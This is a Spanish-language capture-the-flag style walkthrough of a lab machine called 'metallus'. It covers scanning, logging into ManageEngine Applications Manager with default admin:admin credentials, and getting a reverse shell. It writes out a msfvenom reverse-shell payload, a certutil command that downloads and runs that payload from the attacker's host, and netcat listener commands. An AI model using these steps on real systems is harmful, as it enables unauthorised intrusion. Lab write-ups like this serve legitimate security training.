nmap -A -p- -oA metallus 192.168.234.96 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA metallus 192.168.234.96

nmap -sU -O -p- -oA metallus-udp 192.168.234.96

nikto -h 192.168.234.96:80

Pasted image 20210920152440.png

Pasted image 20210920153026.png

whatweb http://192.168.234.96:40443

Pasted image 20210920153209.png

http://192.168.234.96:40443

Pasted image 20210920153305.png

Credenciales admin:admin

searchsploit ManageEngine Application

searchsploit -m 48793

Pasted image 20210920154452.png

Yo trate de ejecutar el siguiente script pero nunca me salia el reverse shell.

https://www.exploit-db.com/exploits/48793

Nos dirigimos a Admin-> Tools -> Upload Files Binaries

Pasted image 20210920153801.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.234 LPORT=443 -f exe > metallus_reverse.exe

Pasted image 20210920154015.png

Creamos un archivo bat con lo siguiente:

certutil.exe -f -urlcache -split http://192.168.49.234/metallus_reverse.exe c:\windows\temp\metallus_reverse.exe && cmd.exe /c c:\windows\temp\metallus_reverse.exe

Pasted image 20210920170502.png

Subimos un archivo llamado 2.bat Y estamos seguros de escoger Choose this option to upload batch files and scripts.

Pasted image 20210920155255.png

Le damos click en Upload

Pasted image 20210920155522.png

Le damos un nombre y el programa a ejecutar en este caso seria 2.bat

Le damos click en Create Action

Le damos click en Execute

Pasted image 20210920155542.png

nc -lvnp 443

python3 -m http.server 80

Pasted image 20210920165019.png

boxes

copyright©2022 Cu3rv0x all rights reserved